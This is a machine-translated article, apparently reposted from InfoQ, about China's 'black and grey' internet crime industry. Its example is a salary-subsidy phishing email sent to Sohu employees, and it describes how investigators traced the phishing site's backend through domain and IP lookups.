“ Internet black and grey products ” This word is not unfamiliar to everyone , But in fact, black production is not equal to ash production , There is still a difference between the two .
Network black and grey production involves black and grey production , In black production “ black ” It mainly refers to that the law clearly stipulates such acts as illegal and criminal acts . Ash production is different from black production , It means that the act has not been clearly stipulated in the legislation , Drifting away from the edge of crime , An act that does not constitute a crime , Such as malicious registration 、 Trading account number, etc .
The network black and grey industry refers to the network crimes implemented with the help of the network platform and technology , Such crimes are organized 、 purposeful 、 There is division of labor and large-scale , Including black industry and grey industry .

Simply speaking , Those who use the Internet to commit crimes are called “ Black industry ”, Providing technical support and help for cybercrime is called “ Gray industry ”.
The main types of network black ash production , Including but not limited to phishing websites 、 Hackers blackmail 、 Trojans 、 telecommunication fraud 、 Mail fraud, etc . But there are many hidden dangers and regulatory blind spots behind the highly developed Internet , Because the new network crime is different from the traditional crime , There are difficulties in the application of charges , some “ Black ash industry ” It was born and spread with the Internet , There are also some problems in the field of e-commerce , Such as hacker attacks 、 Stealing information 、 Stealing accounts, etc .
Some time ago ,# All employees of Sohu suffered wage subsidy fraud # Rush to microblog and search . According to a chat record circulated on the Internet , All employees of Sohu are 5 month 18 I received a letter from “ Sohu Finance Department ” be known as 《5 Notice of monthly employee salary subsidy 》 The mail . The chat record says , Many employees were cheated , The balance of the payroll card is transferred , Subsequently, zhangchaoyang made a response to the incident by sending a blog . This incident is an example of Internet black and grey production , E-mail fraud after stealing account and password .

How did this fraud happen , Let's see .
This underworld organization obtains the advanced permission account of the target mail server through network attack , A letter was sent in the name of the finance department 《 Notice on Issuing the latest wage subsidy 》 mail , The body of this email is the salary subsidy notice , A QR code picture is placed in the text , Induce the recipient to scan the QR code in the body . The content of the email attachment is the same as the email body , It does not carry viruses and executable files .

When the recipient scans the QR code , It will jump to the page of counterfeit UnionPay , This page induces users to input personal information and bank card information , The main purpose of phishing websites is to obtain the user's name 、 ID number 、 Mobile phone number, bank card number and other information .
After obtaining the sensitive information input by the user , adopt API The interface transfers sensitive information to the management background , So that the black industry personnel can carry out targeted fraud .

After the event , A domestic security team carried out a
.
First, through the analysis of e-mail , This email was found through outlook send out , In the source IP It's also outlook Of IP.

Through to HK0PR02MB2497.APCPRD02.PROD.OUTLOOK.COM You can see ,
this IP From the United States for the computer room traffic
, There is no more information about this email .


Then by looking at the front end of the phishing page JS Found that the page calls api Interface , The domain name is api.klh****.***, Inquire about api domain name

Yes IP47.5*.*.*** Reverse query the domain name to find the association 200 Multiple domains , Therefore, the cname technology , Find out the real binding here IP The domain name on is only api.klh***.*** and new.****.***. Log in to this domain name and find that it is the general background of the Mafia organization .
thus , Through domain name resolution and IP Tracing to the source , Found the backstage of the black industry and obtained a lot of evidence .
Black ash industry uses Internet virtual space and related technologies to commit criminal acts , Especially when various network platforms emerge in endlessly , The perpetrator uses the anonymity of the network platform to carry out criminal activities , and IP Traceability is an effective means to trace the suspect , It has been widely used in Internet investigation .
The development and popularization of the Internet have brought great convenience to people's life , The traditional way of life has changed greatly with the help of the Internet , Online shopping 、 Network payment 、 Social networking 、 Network entertainment brings convenience to people , All kinds of cyber crime problems are also happening . In particular, the Internet black and grey products have brought huge property losses to the public and caused social disorder .
With the continuous development and spread of the black ash industry , There will be more new forms in the future , However, the state has carried out special strike actions at all levels . Governance of the Internet black and grey industry should not only rely on legal means , We should also strengthen social coordinated governance , Dig deep into the black ash industrial chain , Go straight to the root of crime .
原网站版权声明
本文为[InfoQ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/161/202206101113160125.html